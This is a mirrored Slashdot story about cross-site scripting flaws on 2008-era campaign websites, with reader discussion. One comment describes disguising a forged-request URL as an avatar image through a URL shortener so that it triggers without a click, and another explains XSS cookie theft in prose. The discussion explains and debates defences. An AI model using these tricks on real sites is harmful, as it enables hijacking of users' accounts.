Slashdot Mirror

← Back to Stories (view on slashdot.org)

Campaign Sites Full of Vulnerabilities

Posted by Hemos on from the not-surprising dept.

An anonymous reader writes "Bloggers have been buzzing about the new wave of "Web 2.0" campaign sites, but it seems that a lot of presidential candidates haven't bothered to protect themselves from cross-site scripting attacks. A blogger has found a collection of XSS vulnerabilities including the websites of Barack Obama, Joe Biden, John Edwards, Mitt Romney, John Cox, Newt Gingrich, Tom Tancredo, the Democratic National Committee, and even a surprise from Whitehouse.gov. Some of the holes are low-risk, but others would allow a user's accounts on the affected website to be compromised. A victim would simply have to click on a maliciously crafted link that appears to lead to the candidate's site."

7 of 36 comments (clear)

  1. There are a lot of things that can be done by TheLink · · Score: 5, Interesting

    There really is plenty that can be done nowadays, and the url shortening sites make it possible to do even more "interesting" stuff.

    For example: some discussion boards only check the url endings to see if it ends with jpg or gif before allowing you to specify it as your avatar.

    Most url shortening sites allow you to add /blah.jpg to the shortened url without grumbling, and they will just append /blah.jpg to the final expanded URL.

    So if you pick an expanded URL of http://targetsite.com/do=somethingnaughty&foo=

    And the shortened URL is say: http://shorturl.org/s/szxvnf

    Then you can specify an image to be http://shorturl.org/s/szxvnf/blah.jpg
    and it will expand to http://targetsite.com/do=somethingnaughty&foo=/bla h.jpg

    And so something naughty happens without the victim even needing to click on anything.

    If the site signs urls with the user's session cookie, and all urls and forms must have a checksum derived from this, then that makes it harder for the attacker.

    However, if the attacker manages to inject javascript somewhere, that javascript could figure out the session cookies and other stuff. And that is why javascript is such a risk.

    To reduce such risks, I proposed years ago to the W3C and browser makers to have an HTML tag that disables active content, but nobody really seemed interested.

    Example:
    <shieldson lock="randomstring" allowed="java,vrml,svg" />
    disallowed material disabled
    <shieldsoff lock="randomstring"/>

    The attacker has to guess "randomstring" in order to inject active content that's not specifically allowed between <shieldson> and <shieldsoff>. Otherwise the browser will just ignore it (and/or log an error).

    Without such tags, HTML is like driving a car with 100 accelerator pedals, but not a single brake pedal. To stop you need to make sure that ALL 100 accelerator pedals are not pressed.

    Various people have said: "Just escape stuff correctly". But I think the evidence is that even though in theory people can make sure all 100 "Go" pedals are "escaped", in practice that doesn't happen well enough.

    Furthermore, if someone comes up with a new "Go" tag #101, your old escaping libraries might not escape it correctly. Whereas my proposed "brake" tag will have a "default deny" behaviour, the browser should only allow specified active content. So any new type of active content that slips through escaping will still be ignored.

    In my opinion the browser makers and browser language makers are not really interested about security.

    Oh well...

    --
    1. Re:There are a lot of things that can be done by Spazntwich · · Score: 2, Funny

      This plan sounds about as effective as protecting your website's content by disabling right-click with javascript.

  2. Hackers = America hatin' terrorists? by cno3 · · Score: 3, Interesting

    Why plug the holes? Blaming "the other guy" for a malicious attack on your web presence makes for such good press.

  3. I dare someone by ReidMaynard · · Score: 3, Funny

    I dare someone to photoshop moustashes on the candidates pics....

    --
    -- www.globaltics.net

    Political discussion for a new world

  4. Re:Why are these vulnerabilities? by ip_vjl · · Score: 3, Informative

    It's because these are exploits that can be done transparently using nothing more than a carefully crafted hyperlink.

    Lets say a malicious blogger posts a story about candidate X. He links to a page on candidate X's site that has one of these vulnerabilities. But instead of just creating a normal link, he links in a way that passes some exploit code into the page that alters its behaviour or content. Maybe changing some page content, or injecting Javascript code that sends your cookies for that site to a handler on his blog so that he can collect login information.

    To Joe web user, he doesn't know anything is going on. His browser is reporting he is on the authentic Candidate X website (even if it was SSL) but is completely unaware that the content has been altered by a 3rd party, or that his login information is going to get sent to site Y instead of the typical login form handler, etc.

    It's not about smart users messing with the page for their OWN amusement, it's about being able to mess with someone else's page with nothing more than a hyperlink (in such a way that doesn't require "hacking" into an account on the local server. Now do you get it?

  5. Re:Why are these vulnerabilities? by Anonymous Coward · · Score: 4, Informative

    Still doesn't make sense. Being able to send data like that would require that the web site accept GET requests but 99% of the time sites only use the POST method.


    Hmm. Let's see what Mitt Romney thinks of your theory.

    (disclaimer: probably not what Mitt actually thinks, but you never know.)
  6. Could be worse by greg1104 · · Score: 2, Funny

    This is nothing compared to all the holes and open ports I found last time I was at the whitehouse.com site.